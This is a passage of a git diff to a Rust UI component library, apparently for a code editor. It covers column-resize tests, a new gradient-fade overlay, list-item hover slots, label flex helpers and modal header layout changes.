"*|*|X|*|*|********", + expected: "*|*|**|*|*|*******", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + grow_cascading_right, + columns: 6, + starting: "*|***|****|**|***|*", + snapshot: "*|***|X|**|**|*****", + expected: "*|***|****|*|*|****", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + squashed_right_reset_col4, + columns: 6, + starting: "*|***|**|**|****|*", + snapshot: "*|********|*|*|X|*", + expected: "*|*****|*|*|****|*", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + reset_col6_right, + columns: 6, + starting: "*|***|**|***|***|**", + snapshot: "*|***|**|***|**|XXX", + expected: "*|***|**|***|***|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + reset_col6_left, + columns: 6, + starting: "*|***|**|***|***|**", + snapshot: "*|***|**|***|****|X", + expected: "*|***|**|***|***|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + last_column_grow_cascading, + columns: 6, + starting: "*|***|**|**|**|***", + snapshot: "*|*******|*|**|*|X", + expected: "*|******|*|*|*|***", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + goes_left_when_left_has_extreme_diff, + columns: 6, + starting: "*|***|****|**|**|***", + snapshot: "*|********|X|*|**|**", + expected: "*|*****|****|*|**|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + basic_shrink_right, + columns: 6, + starting: "**|**|**|**|**|**", + snapshot: "**|**|XXX|*|**|**", + expected: "**|**|**|**|**|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + shrink_should_go_left, + columns: 6, + starting: "*|***|**|*|*|*", + snapshot: "*|*|XXX|**|*|*", + expected: "*|**|**|**|*|*", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + shrink_should_go_right, + columns: 6, + starting: "*|***|**|**|**|*", + snapshot: "*|****|XXX|*|*|*", + expected: "*|****|**|**|*|*", + minimums: "X|*|*|*|*|*", + ); +} + +mod drag_handle { + use super::*; + + fn parse(input: &str) -> (Vec, f32, Option) { + let mut widths = Vec::new(); + let column_index = input.replace("*", "").find("I"); + for col in input.replace("I", "|").split('|') { + widths.push(col.len() as f32); + } + + for w in &widths { + assert!(w.is_finite(), "incorrect number of columns"); + } + let total = widths.iter().sum::(); + for width in &mut widths { + *width /= total; + } + (widths, total, column_index) + } + + #[track_caller] + fn check(distance: i32, widths: &str, expected: &str, resize_behavior: &str) { + let (widths, total_1, Some(column_index)) = parse(widths) else { + panic!("invalid test input: widths should be marked"); + }; + let (expected, total_2, None) = parse(expected) else { + panic!("invalid test input: expected should not be marked: {expected:?}"); + }; + assert_eq!( + total_1, total_2, + "invalid test input: total width not the same" + ); + let cols = widths.len(); + let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); + let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); + + let distance = distance as f32 / total_1; + + let mut widths_table_row = TableRow::from_vec(widths, cols); + RedistributableColumnsState::drag_column_handle( + distance, + column_index, + &mut widths_table_row, + &resize_behavior, + ); + + let result_widths = widths_table_row.as_slice(); + let is_eq = is_almost_eq(result_widths, &expected); + if !is_eq { + let result_str = cols_to_str(result_widths, total_1); + let expected_str = cols_to_str(&expected, total_1); + panic!( + "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_widths:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" + ); + } + } + + macro_rules! check { + (columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { + check($dist, $current, $expected, $resizing); + }; + ($name:ident, columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) => { + #[test] + fn $name() { + check($dist, $current, $expected, $resizing); + } + }; + } + + check!( + basic_right_drag, + columns: 3, + distance: 1, + snapshot: "**|**I**", + expected: "**|***|*", + minimums: "X|*|*", + ); + + check!( + drag_left_against_mins, + columns: 5, + distance: -1, + snapshot: "*|*|*|*I*******", + expected: "*|*|*|*|*******", + minimums: "X|*|*|*|*", + ); + + check!( + drag_left, + columns: 5, + distance: -2, + snapshot: "*|*|*|*****I***", + expected: "*|*|*|***|*****", + minimums: "X|*|*|*|*", + ); +} diff --git a/crates/ui/src/components/diff_stat.rs b/crates/ui/src/components/diff_stat.rs index ec6d515f1b4f847631fc65fae4ed3ccd3185d271..c2e76b171e7e28cc5cb2e2b0c4d776b5bc7e2bfc 100644 --- a/crates/ui/src/components/diff_stat.rs +++ b/crates/ui/src/components/diff_stat.rs @@ -1,3 +1,4 @@ +use crate::Tooltip; use crate::prelude::*; #[derive(IntoElement, RegisterComponent)] @@ -6,6 +7,7 @@ pub struct DiffStat { added: usize, removed: usize, label_size: LabelSize, + tooltip: Option, } impl DiffStat { @@ -15,6 +17,7 @@ impl DiffStat { added, removed, label_size: LabelSize::Small, + tooltip: None, } } @@ -22,41 +25,32 @@ impl DiffStat { self.label_size = label_size; self } + + pub fn tooltip(mut self, tooltip: impl Into) -> Self { + self.tooltip = Some(tooltip.into()); + self + } } impl RenderOnce for DiffStat { fn render(self, _: &mut Window, _cx: &mut App) -> impl IntoElement { + let tooltip = self.tooltip; h_flex() .id(self.id) .gap_1() .child( - h_flex() - .gap_0p5() - .child( - Icon::new(IconName::Plus) - .size(IconSize::XSmall) - .color(Color::Success), - ) - .child( - Label::new(self.added.to_string()) - .color(Color::Success) - .size(self.label_size), - ), + Label::new(format!("+\u{2009}{}", self.added)) + .color(Color::Success) + .size(self.label_size), ) .child( - h_flex() - .gap_0p5() - .child( - Icon::new(IconName::Dash) - .size(IconSize::XSmall) - .color(Color::Error), - ) - .child( - Label::new(self.removed.to_string()) - .color(Color::Error) - .size(self.label_size), - ), + Label::new(format!("\u{2012}\u{2009}{}", self.removed)) + .color(Color::Error) + .size(self.label_size), ) + .when_some(tooltip, |this, tooltip| { + this.tooltip(Tooltip::text(tooltip)) + }) } } diff --git a/crates/ui/src/components/disclosure.rs b/crates/ui/src/components/disclosure.rs index 84282db2e332dc5d39cde2b3aae8d8d181a1024c..320751890dab3a61d2a3ccfaa7917204b5d32c76 100644 --- a/crates/ui/src/components/disclosure.rs +++ b/crates/ui/src/components/disclosure.rs @@ -2,7 +2,7 @@ use std::sync::Arc; use gpui::{ClickEvent, CursorStyle, SharedString}; -use crate::{Color, IconButton, IconButtonShape, IconName, IconSize, prelude::*}; +use crate::prelude::*; #[derive(IntoElement, RegisterComponent)] pub struct Disclosure { @@ -91,7 +91,6 @@ impl RenderOnce for Disclosure { false => self.closed_icon, }, ) - .shape(IconButtonShape::Square) .icon_color(Color::Muted) .icon_size(IconSize::Small) .disabled(self.disabled) diff --git a/crates/ui/src/components/dropdown_menu.rs b/crates/ui/src/components/dropdown_menu.rs index 7a1d3c7dfd77306b2d7b3b6786dae04d6eaee6b2..961608461c04971cda81cfdd64d9eb62577f07ed 100644 --- a/crates/ui/src/components/dropdown_menu.rs +++ b/crates/ui/src/components/dropdown_menu.rs @@ -163,11 +163,10 @@ impl RenderOnce for DropdownMenu { Some( Button::new(self.id.clone(), text) .style(button_style) - .when(self.chevron, |this| { - this.icon(self.trigger_icon) - .icon_position(IconPosition::End) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .when_some(self.trigger_icon.filter(|_| self.chevron), |this, icon| { + this.end_icon( + Icon::new(icon).size(IconSize::XSmall).color(Color::Muted), + ) }) .when(full_width, |this| this.full_width()) .size(trigger_size) diff --git a/crates/ui/src/components/gradient_fade.rs b/crates/ui/src/components/gradient_fade.rs new file mode 100644 index 0000000000000000000000000000000000000000..8a982695ecea7cef9abcf9de2db7ba550971eb8a --- /dev/null +++ b/crates/ui/src/components/gradient_fade.rs @@ -0,0 +1,92 @@ +use gpui::{Hsla, Pixels, SharedString, linear_color_stop, linear_gradient, px}; + +use crate::prelude::*; + +/// A gradient overlay that fades from a solid color to transparent. +#[derive(IntoElement)] +pub struct GradientFade { + base_bg: Hsla, + hover_bg: Hsla, + active_bg: Hsla, + width: Pixels, + right: Pixels, + gradient_stop: f32, + group_name: Option, +} + +impl GradientFade { + pub fn new(base_bg: Hsla, hover_bg: Hsla, active_bg: Hsla) -> Self { + Self { + base_bg, + hover_bg, + active_bg, + width: px(48.0), + right: px(0.0), + gradient_stop: 0.6, + group_name: None, + } + } + + pub fn width(mut self, width: Pixels) -> Self { + self.width = width; + self + } + + pub fn right(mut self, right: Pixels) -> Self { + self.right = right; + self + } + + pub fn gradient_stop(mut self, stop: f32) -> Self { + self.gradient_stop = stop; + self + } + + pub fn group_name(mut self, name: impl Into) -> Self { + self.group_name = Some(name.into()); + self + } +} + +impl RenderOnce for GradientFade { + fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { + let stop = self.gradient_stop; + + // Best-effort to flatten potentially-transparent colors to opaque ones. + let app_bg = cx.theme().colors().background; + let base_bg = app_bg.blend(self.base_bg); + let hover_bg = app_bg.blend(self.hover_bg); + let active_bg = app_bg.blend(self.active_bg); + + div() + .id("gradient_fade") + .absolute() + .top_0() + .right(self.right) + .w(self.width) + .h_full() + .bg(linear_gradient( + 90., + linear_color_stop(base_bg, stop), + linear_color_stop(base_bg.opacity(0.0), 0.), + )) + .when_some(self.group_name.clone(), |element, group_name| { + element.group_hover(group_name, move |s| { + s.bg(linear_gradient( + 90., + linear_color_stop(hover_bg, stop), + linear_color_stop(hover_bg.opacity(0.0), 0.), + )) + }) + }) + .when_some(self.group_name, |element, group_name| { + element.group_active(group_name, move |s| { + s.bg(linear_gradient( + 90., + linear_color_stop(active_bg, stop), + linear_color_stop(active_bg.opacity(0.0), 0.), + )) + }) + }) + } +} diff --git a/crates/ui/src/components/icon/icon_decoration.rs b/crates/ui/src/components/icon/icon_decoration.rs index 9f84a8bcf4eb10672161ed2733d7ed5baa95f899..423f6d73a68e8ee3aea550129e2a6220a8a699a6 100644 --- a/crates/ui/src/components/icon/icon_decoration.rs +++ b/crates/ui/src/components/icon/icon_decoration.rs @@ -63,6 +63,7 @@ pub struct IconDecoration { color: Hsla, knockout_color: Hsla, knockout_hover_color: Hsla, + size: Pixels, position: Point, group_name: Option, } @@ -78,6 +79,7 @@ impl IconDecoration { color, knockout_color, knockout_hover_color: knockout_color, + size: ICON_DECORATION_SIZE, position, group_name: None, } @@ -116,6 +118,12 @@ impl IconDecoration { self } + /// Sets the size of the decoration. + pub fn size(mut self, size: Pixels) -> Self { + self.size = size; + self + } + /// Sets the name of the group the decoration belongs to pub fn group_name(mut self, name: Option) -> Self { self.group_name = name; @@ -125,11 +133,13 @@ impl IconDecoration { impl RenderOnce for IconDecoration { fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement { + let size = self.size; + let foreground = svg() .absolute() .bottom_0() .right_0() - .size(ICON_DECORATION_SIZE) + .size(size) .path(self.kind.fg().path()) .text_color(self.color); @@ -137,7 +147,7 @@ impl RenderOnce for IconDecoration { .absolute() .bottom_0() .right_0() - .size(ICON_DECORATION_SIZE) + .size(size) .path(self.kind.bg().path()) .text_color(self.knockout_color) .map(|this| match self.group_name { @@ -148,7 +158,7 @@ impl RenderOnce for IconDecoration { }); div() - .size(ICON_DECORATION_SIZE) + .size(size) .flex_none() .absolute() .bottom(self.position.y) diff --git a/crates/ui/src/components/keybinding.rs b/crates/ui/src/components/keybinding.rs index e22669995db416a3ec6884a79860e76610dd7d03..016181ee9bd22aba1dd937220df03212aa390153 100644 --- a/crates/ui/src/components/keybinding.rs +++ b/crates/ui/src/components/keybinding.rs @@ -1,13 +1,13 @@ use std::rc::Rc; use crate::PlatformStyle; +use crate::utils::capitalize; use crate::{Icon, IconName, IconSize, h_flex, prelude::*}; use gpui::{ Action, AnyElement, App, FocusHandle, Global, IntoElement, KeybindingKeystroke, Keystroke, Modifiers, Window, relative, }; use itertools::Itertools; -use settings::KeybindSource; #[derive(Debug)] enum Source { @@ -102,11 +102,11 @@ impl KeyBinding { } } - pub fn from_keystrokes(keystrokes: Rc<[KeybindingKeystroke]>, source: KeybindSource) -> Self { + pub fn from_keystrokes(keystrokes: Rc<[KeybindingKeystroke]>, vim_mode: bool) -> Self { Self { source: Source::Keystrokes { keystrokes }, size: None, - vim_mode: source == KeybindSource::Vim, + vim_mode, platform_style: PlatformStyle::platform(), disabled: false, } @@ -142,7 +142,7 @@ fn render_key( match key_icon { Some(icon) => KeyIcon::new(icon, color).size(size).into_any_element(), None => { - let key = util::capitalize(key); + let key = capitalize(key); Key::new(&key, color).size(size).into_any_element() } } @@ -546,7 +546,7 @@ fn keystroke_text( let key = match key { "pageup" => "PageUp", "pagedown" => "PageDown", - key => &util::capitalize(key), + key => &capitalize(key), }; text.push_str(key); } diff --git a/crates/ui/src/components/keybinding_hint.rs b/crates/ui/src/components/keybinding_hint.rs index 7c19953ca43c907070829f7140f97a4fde495b57..9da470c4ee417321c61d1834c1256dd41316aedf 100644 --- a/crates/ui/src/components/keybinding_hint.rs +++ b/crates/ui/src/components/keybinding_hint.rs @@ -14,11 +14,10 @@ use theme::Appearance; /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; -/// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( -/// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-s").unwrap())].into(), KeybindSource::Base), +/// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-s").unwrap())].into(), false), /// Hsla::black() /// ) /// .prefix("Save:") @@ -46,11 +45,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), false), /// Hsla::black() /// ); /// # } @@ -76,12 +74,11 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::with_prefix( /// "Copy:", - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), false), /// Hsla::black() /// ); /// # } @@ -111,11 +108,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::with_suffix( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-v").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-v").unwrap())].into(), false), /// "Paste", /// Hsla::black() /// ); @@ -145,11 +141,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-x").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-x").unwrap())].into(), false), /// Hsla::black() /// ) /// .prefix("Cut:"); @@ -170,11 +165,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-f").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-f").unwrap())].into(), false), /// Hsla::black() /// ) /// .suffix("Find"); @@ -195,11 +189,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-z").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-z").unwrap())].into(), false), /// Hsla::black() /// ) /// .size(Pixels::from(16.0)); diff --git a/crates/ui/src/components/label/highlighted_label.rs b/crates/ui/src/components/label/highlighted_label.rs index 840bba7b173fe31a3472d758c64b0b1ef984da2c..73e03f82dfdef38f10c62b69be3b75da8a24dd08 100644 --- a/crates/ui/src/components/label/highlighted_label.rs +++ b/crates/ui/src/components/label/highlighted_label.rs @@ -1,6 +1,6 @@ use std::ops::Range; -use gpui::{FontWeight, HighlightStyle, StyledText}; +use gpui::{FontWeight, HighlightStyle, StyleRefinement, StyledText}; use crate::{LabelCommon, LabelLike, LabelSize, LineHeightStyle, prelude::*}; @@ -29,6 +29,33 @@ impl HighlightedLabel { } } + /// Constructs a label with the given byte ranges highlighted. + /// Assumes that the highlight ranges are valid UTF-8 byte positions. + pub fn from_ranges( + label: impl Into, + highlight_ranges: Vec>, + ) -> Self { + let label = label.into(); + let highlight_indices = highlight_ranges + .iter() + .flat_map(|range| { + let mut indices = Vec::new(); + let mut index = range.start; + while index < range.end { + indices.push(index); + index += label[index..].chars().next().map_or(0, |c| c.len_utf8()); + } + indices + }) + .collect(); + + Self { + base: LabelLike::new(), + label, + highlight_indices, + } + } + pub fn text(&self) -> &str { self.label.as_str() } @@ -38,6 +65,40 @@ impl HighlightedLabel { } } +impl HighlightedLabel { + fn style(&mut self) -> &mut StyleRefinement { + self.base.base.style() + } + + pub fn flex_1(mut self) -> Self { + self.style().flex_grow = Some(1.); + self.style().flex_shrink = Some(1.); + self.style().flex_basis = Some(gpui::relative(0.).into()); + self + } + + pub fn flex_none(mut self) -> Self { + self.style().flex_grow = Some(0.); + self.style().flex_shrink = Some(0.); + self + } + + pub fn flex_grow(mut self) -> Self { + self.style().flex_grow = Some(1.); + self + } + + pub fn flex_shrink(mut self) -> Self { + self.style().flex_shrink = Some(1.); + self + } + + pub fn flex_shrink_0(mut self) -> Self { + self.style().flex_shrink = Some(0.); + self + } +} + impl LabelCommon for HighlightedLabel { fn size(mut self, size: LabelSize) -> Self { self.base = self.base.size(size); diff --git a/crates/ui/src/components/label/label.rs b/crates/ui/src/components/label/label.rs index d0f50c00336eb971621e2da7bbaf53cf09569caa..405948ea06c7e86fcb3dec217186596bdaaf0aeb 100644 --- a/crates/ui/src/components/label/label.rs +++ b/crates/ui/src/components/label/label.rs @@ -73,6 +73,34 @@ impl Label { gpui::margin_style_methods!({ visibility: pub }); + + pub fn flex_1(mut self) -> Self { + self.style().flex_grow = Some(1.); + self.style().flex_shrink = Some(1.); + self.style().flex_basis = Some(gpui::relative(0.).into()); + self + } + + pub fn flex_none(mut self) -> Self { + self.style().flex_grow = Some(0.); + self.style().flex_shrink = Some(0.); + self + } + + pub fn flex_grow(mut self) -> Self { + self.style().flex_grow = Some(1.); + self + } + + pub fn flex_shrink(mut self) -> Self { + self.style().flex_shrink = Some(1.); + self + } + + pub fn flex_shrink_0(mut self) -> Self { + self.style().flex_shrink = Some(0.); + self + } } impl LabelCommon for Label { diff --git a/crates/ui/src/components/label/label_like.rs b/crates/ui/src/components/label/label_like.rs index d87bdf6c12323c4858881f36af62f1a91cdd2aa1..5cad04efcfabcc80648c005f8d18ec5805970a39 100644 --- a/crates/ui/src/components/label/label_like.rs +++ b/crates/ui/src/components/label/label_like.rs @@ -1,8 +1,6 @@ use crate::prelude::*; use gpui::{FontWeight, Rems, StyleRefinement, UnderlineStyle}; -use settings::Settings; use smallvec::SmallVec; -use theme::ThemeSettings; /// Sets the size of a label #[derive(Debug, PartialEq, Clone, Copy, Default)] @@ -191,7 +189,7 @@ impl LabelCommon for LabelLike { } fn buffer_font(mut self, cx: &App) -> Self { - let font = theme::ThemeSettings::get_global(cx).buffer_font.clone(); + let font = theme::theme_settings(cx).buffer_font(cx).clone(); self.weight = Some(font.weight); self.base = self.base.font(font); self @@ -200,7 +198,7 @@ impl LabelCommon for LabelLike { fn inline_code(mut self, cx: &App) -> Self { self.base = self .base - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme::theme_settings(cx).buffer_font(cx).clone()) .bg(cx.theme().colors().element_background) .rounded_sm() .px_0p5(); @@ -258,7 +256,7 @@ impl RenderOnce for LabelLike { .text_color(color) .font_weight( self.weight - .unwrap_or(ThemeSettings::get_global(cx).ui_font.weight), + .unwrap_or(theme::theme_settings(cx).ui_font(cx).weight), ) .children(self.children) } diff --git a/crates/ui/src/components/list/list_header.rs b/crates/ui/src/components/list/list_header.rs index 8726dca50dada193b3051f14b6609a373fc60730..9d72366c3be4907c7d4e9e3dc0466903cbc58069 100644 --- a/crates/ui/src/components/list/list_header.rs +++ b/crates/ui/src/components/list/list_header.rs @@ -3,8 +3,7 @@ use std::sync::Arc; use crate::{Disclosure, prelude::*}; use component::{Component, ComponentScope, example_group_with_title, single_example}; use gpui::{AnyElement, ClickEvent}; -use settings::Settings; -use theme::ThemeSettings; +use theme::UiDensity; #[derive(IntoElement, RegisterComponent)] pub struct ListHeader { @@ -81,7 +80,7 @@ impl Toggleable for ListHeader { impl RenderOnce for ListHeader { fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { - let ui_density = ThemeSettings::get_global(cx).ui_density; + let ui_density = theme::theme_settings(cx).ui_density(cx); h_flex() .id(self.label.clone()) @@ -91,7 +90,7 @@ impl RenderOnce for ListHeader { .child( div() .map(|this| match ui_density { - theme::UiDensity::Comfortable => this.h_5(), + UiDensity::Comfortable => this.h_5(), _ => this.h_7(), }) .when(self.inset, |this| this.px_2()) diff --git a/crates/ui/src/components/list/list_item.rs b/crates/ui/src/components/list/list_item.rs index d581fad9453d9812f17b7bc9e0297fb9927c8188..9a764efd58cfd3365d92e534a715a0f23ce46e90 100644 --- a/crates/ui/src/components/list/list_item.rs +++ b/crates/ui/src/components/list/list_item.rs @@ -14,6 +14,14 @@ pub enum ListItemSpacing { Sparse, } +#[derive(Default)] +enum EndSlotVisibility { + #[default] + Always, + OnHover, + SwapOnHover(AnyElement), +} + #[derive(IntoElement, RegisterComponent)] pub struct ListItem { id: ElementId, @@ -28,9 +36,7 @@ pub struct ListItem { /// A slot for content that appears after the children, usually on the other side of the header. /// This might be a button, a disclosure arrow, a face pile, etc. end_slot: Option, - /// A slot for content that appears on hover after the children - /// It will obscure the `end_slot` when visible. - end_hover_slot: Option, + end_slot_visibility: EndSlotVisibility, toggle: Option, inset: bool, on_click: Option>, @@ -45,6 +51,8 @@ pub struct ListItem { rounded: bool, overflow_x: bool, focused: Option, + docked_right: bool, + height: Option, } impl ListItem { @@ -59,7 +67,7 @@ impl ListItem { indent_step_size: px(12.), start_slot: None, end_slot: None, - end_hover_slot: None, + end_slot_visibility: EndSlotVisibility::default(), toggle: None, inset: false, on_click: None, @@ -74,6 +82,8 @@ impl ListItem { rounded: false, overflow_x: false, focused: None, + docked_right: false, + height: None, } } @@ -161,8 +171,14 @@ impl ListItem { self } - pub fn end_hover_slot(mut self, end_hover_slot: impl Into>) -> Self { - self.end_hover_slot = end_hover_slot.into().map(IntoElement::into_any_element); + pub fn end_slot_on_hover(mut self, end_slot_on_hover: E) -> Self { + self.end_slot_visibility = + EndSlotVisibility::SwapOnHover(end_slot_on_hover.into_any_element()); + self + } + + pub fn show_end_slot_on_hover(mut self) -> Self { + self.end_slot_visibility = EndSlotVisibility::OnHover; self } @@ -185,6 +201,16 @@ impl ListItem { self.focused = Some(focused); self } + + pub fn docked_right(mut self, docked_right: bool) -> Self { + self.docked_right = docked_right; + self + } + + pub fn height(mut self, height: Pixels) -> Self { + self.height = Some(height); + self + } } impl Disableable for ListItem { @@ -213,32 +239,31 @@ impl RenderOnce for ListItem { .id(self.id) .when_some(self.group_name, |this, group| this.group(group)) .w_full() + .when_some(self.height, |this, height| this.h(height)) .relative() // When an item is inset draw the indent spacing outside of the item .when(self.inset, |this| { this.ml(self.indent_level as f32 * self.indent_step_size) .px(DynamicSpacing::Base04.rems(cx)) }) - .when(!self.inset && !self.disabled, |this| { - this - // TODO: Add focus state - // .when(self.state == InteractionState::Focused, |this| { - .when_some(self.focused, |this, focused| { - if focused { - this.border_1() - .border_color(cx.theme().colors().border_focused) - } else { - this.border_1() - } - }) - .when(self.selectable, |this| { - this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) - .active(|style| style.bg(cx.theme().colors().ghost_element_active)) - .when(self.outlined, |this| this.rounded_sm()) - .when(self.selected, |this| { - this.bg(cx.theme().colors().ghost_element_selected) - }) - }) + .when(!self.inset, |this| { + this.when_some(self.focused, |this, focused| { + if focused && !self.disabled { + this.border_1() + .when(self.docked_right, |this| this.border_r_2()) + .border_color(cx.theme().colors().border_focused) + } else { + this.border_1() + } + }) + .when(self.selectable && !self.disabled, |this| { + this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) + .active(|style| style.bg(cx.theme().colors().ghost_element_active)) + .when(self.outlined, |this| this.rounded_sm()) + .when(self.selected, |this| { + this.bg(cx.theme().colors().ghost_element_selected) + }) + }) }) .when(self.rounded, |this| this.rounded_sm()) .when_some(self.on_hover, |this, on_hover| this.on_hover(on_hover)) @@ -255,27 +280,22 @@ impl RenderOnce for ListItem { ListItemSpacing::ExtraDense => this.py_neg_px(), ListItemSpacing::Sparse => this.py_1(), }) - .when(self.inset && !self.disabled, |this| { - this - // TODO: Add focus state - //.when(self.state == InteractionState::Focused, |this| { - .when_some(self.focused, |this, focused| { - if focused { - this.border_1() - .border_color(cx.theme().colors().border_focused) - } else { - this.border_1() - } - }) - .when(self.selectable, |this| { - this.hover(|style| { - style.bg(cx.theme().colors().ghost_element_hover) - }) + .when(self.inset, |this| { + this.when_some(self.focused, |this, focused| { + if focused && !self.disabled { + this.border_1() + .border_color(cx.theme().colors().border_focused) + } else { + this.border_1() + } + }) + .when(self.selectable && !self.disabled, |this| { + this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) .active(|style| style.bg(cx.theme().colors().ghost_element_active)) .when(self.selected, |this| { this.bg(cx.theme().colors().ghost_element_selected) }) - }) + }) }) .when_some( self.on_click.filter(|_| !self.disabled), @@ -330,28 +350,31 @@ impl RenderOnce for ListItem { .children(self.start_slot) .children(self.children), ) + .when(self.end_slot.is_some(), |this| this.justify_between()) .when_some(self.end_slot, |this, end_slot| { - this.justify_between().child( - h_flex() + this.child(match self.end_slot_visibility { + EndSlotVisibility::Always => { + h_flex().flex_shrink().overflow_hidden().child(end_slot) + } + EndSlotVisibility::OnHover => h_flex() .flex_shrink() .overflow_hidden() - .when(self.end_hover_slot.is_some(), |this| { - this.visible() - .group_hover("list_item", |this| this.invisible()) - }) - .child(end_slot), - ) - }) - .when_some(self.end_hover_slot, |this, end_hover_slot| { - this.child( - h_flex() - .h_full() - .absolute() - .right(DynamicSpacing::Base06.rems(cx)) - .top_0() .visible_on_hover("list_item") - .child(end_hover_slot), - ) + .child(end_slot), + EndSlotVisibility::SwapOnHover(hover_slot) => h_flex() + .relative() + .flex_shrink() + .child(h_flex().visible_on_hover("list_item").child(hover_slot)) + .child( + h_flex() + .absolute() + .inset_0() + .justify_end() + .overflow_hidden() + .group_hover("list_item", |this| this.invisible()) + .child(end_slot), + ), + }) }), ) } diff --git a/crates/ui/src/components/modal.rs b/crates/ui/src/components/modal.rs index d67d2e0f1637afc3705ae04f6fd8b8676a87e15a..fbd5f42989e20d0c8aa98693ca9e13eaa1077280 100644 --- a/crates/ui/src/components/modal.rs +++ b/crates/ui/src/components/modal.rs @@ -1,7 +1,5 @@ -use crate::{ - Clickable, Color, DynamicSpacing, Headline, HeadlineSize, Icon, IconButton, IconButtonShape, - IconName, Label, LabelCommon, LabelSize, h_flex, v_flex, -}; +use crate::{IconButtonShape, prelude::*}; + use gpui::{prelude::FluentBuilder, *}; use smallvec::SmallVec; use theme::ActiveTheme; @@ -162,13 +160,14 @@ impl RenderOnce for ModalHeader { children.insert( 0, Headline::new(headline) - .size(HeadlineSize::XSmall) + .size(HeadlineSize::Small) .color(Color::Muted) .into_any_element(), ); } h_flex() + .min_w_0() .flex_none() .justify_between() .w_full() @@ -187,26 +186,33 @@ impl RenderOnce for ModalHeader { }) .child( v_flex() + .min_w_0() .flex_1() .child( h_flex() + .w_full() .gap_1() - .when_some(self.icon, |this, icon| this.child(icon)) - .children(children), + .justify_between() + .child( + h_flex() + .gap_1() + .when_some(self.icon, |this, icon| this.child(icon)) + .children(children), + ) + .when(self.show_dismiss_button, |this| { + this.child( + IconButton::new("dismiss", IconName::Close) + .icon_size(IconSize::Small) + .on_click(|_, window, cx| { + window.dispatch_action(menu::Cancel.boxed_clone(), cx); + }), + ) 